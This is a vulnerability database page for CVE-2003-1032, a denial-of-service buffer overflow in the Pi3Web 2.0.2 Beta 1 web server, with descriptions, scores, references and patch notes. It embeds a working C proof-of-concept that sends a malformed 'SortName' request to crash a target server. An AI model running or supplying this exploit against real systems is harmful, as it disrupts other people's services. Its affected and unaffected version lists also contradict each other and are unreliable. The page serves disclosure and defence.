CVE-2003-1032
CVSS5.0
发布时间 :2004-02-17 00:00:00
修订时间 :2016-10-17 22:39:11
NMCOES    

[原文]Pi3Web web server 2.0.2 Beta 1, when the Directory Index is configured to use the "Name" column and sort using the column title as a hyperlink, allows remote attackers to cause a denial of service (crash) via a malformed URL to the web server, possibly involving a buffer overflow.


[CNNVD]Pi3Web SortName缓冲区溢出漏洞(CNNVD-200402-068)

        Pi3Web网络服务器2.0.2 Beta 1版本存在漏洞。当目录索引被配置为使用"名字"列以及按照作为超链接的列名排序时,远程攻击者可以借助到web服务器的畸形URL导致服务拒绝(崩溃),该漏洞可能涉及缓冲区溢出。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1032
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1032
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-068
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105484265218325&w=2
(UNKNOWN)  BUGTRAQ  20030605 Re: Tripbit Advisory TA-2003-05 Buffer Overflow Vulnerability in Pi3 Web
http://securitytracker.com/id?1006913
(UNKNOWN)  SECTRACK  1006913
http://www.securityfocus.com/bid/7787
(VENDOR_ADVISORY)  BID  7787

- 漏洞信息

Pi3Web SortName缓冲区溢出漏洞
中危 缓冲区溢出
2004-02-17 00:00:00 2005-10-20 00:00:00
远程  
        Pi3Web网络服务器2.0.2 Beta 1版本存在漏洞。当目录索引被配置为使用"名字"列以及按照作为超链接的列名排序时,远程攻击者可以借助到web服务器的畸形URL导致服务拒绝(崩溃),该漏洞可能涉及缓冲区溢出。

- 公告与补丁

        This issue has been addressed in Pi3Web 2.0.2 Beta 2.
        Pi3 Pi3Web 2.0.2 Beta 1
        
        Pi3 Pi3Web 2.0.2
        

- 漏洞信息 (22718)

Pi3Web 2.0.2 SortName Buffer Overflow Vulnerability (EDBID:22718)
windows dos
2003-06-02 Verified
0 posidron
N/A [点击下载]
source: http://www.securityfocus.com/bid/7787/info

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms. 

/*********************************************************************
*
*     Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
*    Tripbit Security Development
*    ----------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*       [-] IRC: irc.euirc.net 6667 #tripbit
*
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
*     Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;

    char sendstring[1024];

    strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n",argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
    {
        printf("Can't start socket()!\n");
        exit(0);
    }

    if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
    {
        printf("Can't connect!\n");
        exit(0);
    }

    printf("Dos against Pi3 Web Server v2.0.2\n");

    write(sockfd,sendstring,strlen(sendstring));

    printf("Attack done!...\n");

    close(sockfd);
}
		

- 漏洞信息

11092
Pi3Web Name Column Sorting Malformed URL DoS
Denial of Service
Loss of Availability

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-02 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Pi3Web SortName Buffer Overflow Vulnerability
Boundary Condition Error 7787
Yes No
2003-06-02 12:00:00 2009-07-11 10:06:00
Discovery is credited to "Rushjo@tripbit.org" <rushjo@tripbit.org>.

- 受影响的程序版本

Pi3 Pi3Web 2.0.2 Beta 1
Pi3 Pi3Web 2.0.2
Pi3 Pi3Web 2.0.2 Beta 2
Pi3 Pi3Web 2.0.2 Beta 1

- 不受影响的程序版本

Pi3 Pi3Web 2.0.2 Beta 2
Pi3 Pi3Web 2.0.2 Beta 1

- 漏洞讨论

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms.

- 漏洞利用

The following denial of service proof-of-concept example was submitted:

- 解决方案

This issue has been addressed in Pi3Web 2.0.2 Beta 2.


Pi3 Pi3Web 2.0.2 Beta 1

Pi3 Pi3Web 2.0.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站